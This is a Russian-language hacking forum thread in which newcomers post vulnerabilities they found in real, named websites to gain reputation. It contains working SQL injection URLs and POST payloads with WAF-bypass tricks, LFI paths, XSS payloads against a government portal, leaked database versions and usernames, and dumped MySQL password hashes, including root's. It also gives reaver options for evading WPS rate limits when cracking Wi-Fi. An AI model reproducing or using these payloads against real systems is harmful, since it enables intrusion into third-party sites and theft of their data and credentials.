Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.

Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:

Google:

Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.

Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-

Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .

Три lfi

http://greyslon.ru/index.php

post

action=register

&ajax=true

&data=login%3De%26email%3De%26pass%3De%26repass%3D e%26payeer%3De%26captcha%3De

&page=../info

Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла

bidderland.co.in/siteadmin

Эта уязвимость эксплуатируется за 5 секунд.

нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.

А что не раскрутил ?

Версия: 5.5.43-37.2

User: c2deuts_ice@localhost

-----------------------------

Зачем делать несколько постов можно в одном все выложить

Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.

5.5.40-0ubuntu0.12.04.1 - вывод в заголовке

5.6.23

4.1.18-nt

idserver_damico@winwebs03.cpt.wa.co.za

idserver_damicodb

5.5.42-cll

http://goo.gl/imjzsb

http://goo.gl/8IKVeV

http://goo.gl/wYRBLz

http://emofans.ru/gallery/emowallp/

POST_DATA:

foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0 x7e7e496e6a6563746564204279204d69737465725f4265727 4306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version() )e)f)x)) -- -

https://www.choosewellness.com.ph/ca...entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e20 7374796c653d22666f6e742d66616d696c793a4963656c616e 643b636f6c6f723a7265643b73697a653a353b746578742d73 6861646f773a23303030203070782030707820337078223e4d 69737465725f42657274306e693c62723e,0x4461746162617 365203a3a202020,DATABASE(),0x3c62723e506f727420203 a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3 a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSIO N_COMPILE_MACHINE,0x3c62723e56657273696f6e206f6620 4461746162617365203a3a2020,version(),0xa3c62723e48 6f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e ))x)x)

Демонстрация SQLi от меня

Демонстрация SQLi от меня

SQLi на сайте bitbank

Да да 5 сек даже много)))

Внесу и я свои первые 5 копеек

http://www.leong-leong.com/press.ph...,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29 --

http://java.lordy.ru/

Есть жаба игра, зарегавшись, в чате можно написать ">alert(XSS)", после этого на java.lordy.ru высветится XSS.

jhewlett_r@209.68.5.201

jhewlett_prod:5.0.96-log

5.0.96-log

nightgallery20@72.167.232.44

nightgallery20

10.0.17-MariaDB-cll-lve

austral3_casso@server-2h-r34.ipv4.au.syr

4.0.26-standard-log

novagoraTest

novagoraTest@10.0.5.18

search=') union select 1,concat(User,Password),3,4,5,6,7 from mysql.user#&submit_s=

root*B7C246CBBD3D468E80CB40AD57BA8BAFFEEB62BC
debian-sys-maint*E639A7C638862F6392314324D1E7537900655649

adelina*21A61A920952BE6489C905AA3836F552D4A1C631

Версия: 5.6.23

User: oarorgro_oar@localhost

XSS

http://gov.cap.ru/?__VIEWSTATE=/wEPDwUKLTczMDc3ODY5Nw9kFgJmD2QWAgIDD2QWEgIBD2QWAgI BD2QWAgIBDxYCHgRUZXh0BXLQp9GD0LLQsNGI0YHQutCw0Y8g0 YDQtdGB0L/Rg9Cx0LvQuNC60LAgPGRpdj7QntGE0LjRhtC40LDQu9GM0L3Ri 9C5INC/0L7RgNGC0LDQuyDQvtGA0LPQsNC90L7QsiDQstC70LDRgdGC0L g8L2Rpdj5kAgMPZBYOAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYC HwFoZBYCZg8PFgIeC05hdmlnYXRlVXJsBTpodHRwOi8vZ292Lm NhcC5ydS9Pcmdhbml6YXRpb24uYXNweD9nb3ZfaWQ9NDkmdW5p dD1jb250YWN0ZGQCBQ8PFgIfAWhkFgJmDw8WAh8CBSpodHRwOi 8vZ292LmNhcC5ydS9TdHJ1Y3R1cmUuYXNweD9nb3ZfaWQ9NDlk ZAIJDw8WAh8BZ2QWAmYPFgIeBGhyZWYFMmh0dHA6Ly9nb3YuY2 FwLnJ1L1NpdGVNYXAuYXNweD9pZD0zNjU0NzcmZ292X2lkPTQ5 ZAILDw8WAh8CBShodHRwOi8vZ292LmNhcC5ydS9TaXRlTWFwLm FzcHg/Z292X2lkPTQ5ZGQCDQ8PFgIfAgUtaHR0cDovL2dvdi5jYXAucn Uvc3BlYy9EZWZhdWx0LmFzcHg/Z292X2lkPTQ5ZGQCDw8PFgIfAgUmaHR0cDovL2dvdi5jYXAucn UvcnNzLz9nb3ZfaWQ9NDkmaWQ9NDlkZAIHD2QWBgIDDw8WAh8B Z2RkAgUPDxYCHwFnZGQCFQ8PFgIfAWdkZAINDw8WAh8BZ2RkAh EPDxYCHwFoZGQCEw9kFhoCAQ9kFgICAQ8PFgIfAgUcaW5mby5h c3B4P2dvdl9pZD00OSZ0eXBlPXRvcGRkAgMPZBYCAgEPDxYCHw IFHWluZm8uYXNweD9nb3ZfaWQ9NDkmdHlwZT1tYWluZGQCBQ9k FgICAQ8PFgIfAgUdaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPW 5ld3NkZAIHDw8WAh8BaGRkAgkPZBYCAgEPDxYCHwIFFHZpZGVv LmFzcHg/Z292X2lkPTQ5ZGQCCw8PFgIfAWhkZAINDw8WAh8BaGQWAgIBDw 8WAh8CBRdjYWxlbmRhci5hc3B4P2dvdl9pZD00OWRkAg8PZBYC AgEPDxYCHwIFGlB1YmxpY2F0aW9uLmFzcHg/Z292X2lkPTQ5ZGQCEQ9kFgICAQ8PFgIfAgUYTWVtb3JpYWxzLm FzcHg/Z292X2lkPTQ5ZGQCEw8PFgIfAWhkZAIVD2QWAgIBDw8WAh8CBR NsYXdzLmFzcHg/Z292X2lkPTQ5ZGQCFw8PFgIfAWhkZAIZDw8WAh8BaGRkAhUPDx YCHwFoZGQCFw8PFgIfAWdkZAIbD2QWAgIBDw8WAh8CBSZPcmdz LmFzcHg/Z292X2lkPTQ5JmlkPTQ5JnVuaXQ9Y29udGFjdGRkZP3Mf6N7AL xvhcyia+88BzPuA4FLR9eN77dXGFDCRBD/&ctl00$Search1$BtnSearch=&__VIEWSTATEGENERATOR=CA0 B0334&ctl00$Search1$TextSearch=античатalert ()&__EVENTVALIDATION=/wEWBwK1y/X1DALNk6LCAwKbnsfFCAK8lLmCCQLC9M+dCwKC1JS2BwKjz9/DAXkyh+c6G8rMsfjzrV2Wjy6zi7nnNfiqJHMfqPO+S6mI&ctl0 0$Comments=античат&ctl00$ErrorText=

http://goo.gl/uMgvlO

Может кто знает как здесь WAF на information_schema обойти?

Для этого будет создан отдельный раздел?Где они будут постится?

Да, тут есть конкурс на безопасность ОС, итд Это + к репе

Я стану первым кто сделает это

И так мой исследование и авторство

Надеюсь маленькие глупенькие не увидят

И так расскажу как можно обойти

WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking при взломе wi-fi

Всё очень просто

-T, --m57-timeout=

-d, --delay=

-t, --timeout=

команда примет такой вид

reaver -i mon0 -b 00;11;11;11;11;11 -c 12 -vv -m57-timeout=20 --delay=20 --timeout=20

советую в комплексе использовать очень важная команда --delay. Остальные для успокоение души.

п.с советую начать не с 20, а с 50 или 100

читайте мануалы к программам, вот что я вам скажу

Не на всех роутерах delay помогает))) TP-Link-и часто в лок уходят после 10 неправильных попыток ввода пина с одного мак-адреса и delay там все равно)

Версия:4.1.21-standard

User:ctrekker@localhost

Это какой то сверх дырявый сайт и причем очень давно.

А этот пойдет?

по моему lfi но я не могу раскрутить, если кто подскажет буду признателен

Набранное количество баллов позволяет Вам задавать вопросы по уязвимостям в профильном разделе форума.

По поводу вопроса - небольшая подсказка:

http://m.deffki.su/?go=php://filter/...resource=index

Version::5.5.40-0ubuntu0.12.04.1

User:: c31cooncooncom@localhost

/threads/21336/page-663#post-2395458

/threads/21336/page-607#post-2158662

Version:: 5.1.48-community

User:: root@localhost

перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:

Google: site:antichat.ru вашсайтсуязвимостью.ру

Господа, требуется написать некий пример, эксплоит с выводом.. а не поле = VULNERABLE и ковычка у параметра.

Version:: 5.5.32-log

User:: pidsphil_user1@10.20.112.231

Не очень я люблю xss

Ну так же ради юмора

нашёл случайно в попытках вставить php код.

Там ещё sql есть

[HTML]
HTML:
...
...
,,subscribers,is_active,,temp_keys,session_id,,tem p_keys,code,,temp_keys,date,,users,id,,users,user_ pass,,users,email,,users,name,,users,company,,user s,activity,,users,position,,users,phone,,users,reg time,,users,last_visit_time,,users,last_ip,,users, code,,users,is_blocked,,users,is_active,,users,sub scribe,,users_sessions,session_id,,users_sessions, unid,,users_sessions,created_time,,year,id">

Version:: 5.5.43-0+deb7u1

User:: muzhuis_qbusa@194.109.22.94

Мои 5 копеек

http://www.podarochek .by/about?curCategory=10&curItem=-666+union+select+1,3,user%28%29,5,6,7,8,9,10